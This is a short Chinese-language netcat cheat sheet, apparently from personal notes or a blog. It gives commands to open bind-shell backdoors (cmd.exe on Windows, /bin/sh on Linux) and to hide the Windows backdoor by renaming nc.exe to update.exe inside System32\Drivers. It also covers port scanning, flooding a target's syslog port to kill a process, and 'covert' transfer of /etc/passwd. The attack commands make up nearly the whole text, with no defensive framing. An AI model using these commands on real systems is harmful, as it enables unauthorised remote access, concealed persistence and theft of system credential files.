一、在win下开放cmd后门

在终端下的命令：

nc.exe -l -p 4455 -d -e cmd.exe

上述命令只能依托于命令行运行，我们可以吧-l 参数换成 -L（-L只能在win下才能使用）

nc.exe -L -p 4455 -d -e cmd.exe

可以把nc程序重命名为升级程序，增加隐蔽性

move nc.exe c:\Windows\System32\Drivers\update.exe

update.exe -p 4455 -d -L -e cmd.exe

在linux上开启后门

nc -u -l -p 55555 -e /bin/sh

连接linux后门

nc -u targethost 55555 -e /bin/sh

二、开启端口监听

nc.exe -l -p 80

三、端口扫描

简略查看开放端口

nc -z -v 192.168.43.96 1-1000

较详细查看开放端口

nc -v 192.168.43.96 1-1000

nc -v 192.168.43.96 21 22 80

四、不断输出字符串杀死进程(targethost为目标ip地址)（UDP通信）

yes “<20>blahblahblah” | nc -u -s 10.0.0.1 targethost 514

五、文件传输（构建自己的ftp）(隐蔽的文件传输)

在服务机

nc -l -u -p 55555 < 1.txt

nc -l -u -p 55555 < /etc/passwd

在客户端

nc -u -targethost 55555 > 1.txt